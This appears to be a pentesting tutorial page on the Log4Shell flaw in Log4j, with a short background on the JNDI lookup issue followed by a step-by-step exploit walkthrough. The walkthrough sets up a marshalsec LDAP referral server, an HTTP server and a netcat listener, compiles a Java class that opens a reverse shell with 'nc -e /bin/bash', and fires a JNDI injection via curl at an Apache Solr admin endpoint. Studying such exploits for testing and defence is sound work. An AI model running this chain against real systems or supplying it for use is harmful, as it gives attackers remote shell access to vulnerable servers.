Log4Shell¶
Background¶
The Log4j vulnerability is a critical security flaw that gained widespread attention in December 2021. The exploitation of the vulnerability is often called Log4Shell as it is used to gain shell access. Log4j is a logging framework that developers use to record activity within their applications. It's part of the Apache Logging Services and the library is known for its performance and flexibility, offering various logging capabilities that have become essential in software development.
The exploit takes advantage of the way Log4j processes log messages by misusing the library's Java Naming and Directory Interface (JNDI) feature. JNDI is an API in Java that allows Java software clients to look up data and resources (such as objects) via a name. The exploit occurs when a maliciously crafted log message triggers a JNDI lookup to an attacker-controlled server, leading to the execution of arbitrary code.
Process¶
There are a great many applications that rely on Log4j, but one of the most notable is Apache. Once you have identified a service that is vulnerabile, you can set up testing. Testing means getting an ldap server running to handle deserialization of the exploit which you can do through the referenced repo's .jar file. You then set up an http server on the attacker host as a means of delivering the exploit. You'll also have a netcat listener set up to receive the callback once the JNDI logging executes the exploit.
What does that actually look like?¶
-
First grab tools.
git clone https://github.com/mbechler/marshalsec
cd marshalsec && ls
-
Open a second terminal and fire up an http server on port 8080.
python3 -m http.server 8080
- Open a third terminal for the netcat listener.
nc -lvnp 4444
- Establish the attacker-controlled LDAP server by getting the .jar running. Note: You'll need to enter the appropriate jar version based on what you downloaded and enter your http server's IP and the name of your exploit (which will be created in the next step).
java -cp target/marshalsec-[VERSION]-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOURHTTPSERVERIP:8080/#EXPLOITNAME"
-
Craft the exploit.
nano EXPLOITNAME.java
public class EXPLOITNAME { static { try { java.lang.Runtime.getRuntime().exec("nc NETCATIP 4444 -e /bin/bash"); } catch (Exception err) { err.printStackTrace(); } } }
-
Compile the Exploit
javac EXPLOITNAME.java
ls
-
Time for the fun.
curl 'http://VICTIMDOMAIN:8983/solr/admin/cores?foo=$\{jndi:ldap://LDAPSERVERIP:1389/EXPLOITNAME\}'
If executed successfully, running curl will result in output from the http server first, then the ldap server, and finally, the netcat listener where you will have shell access.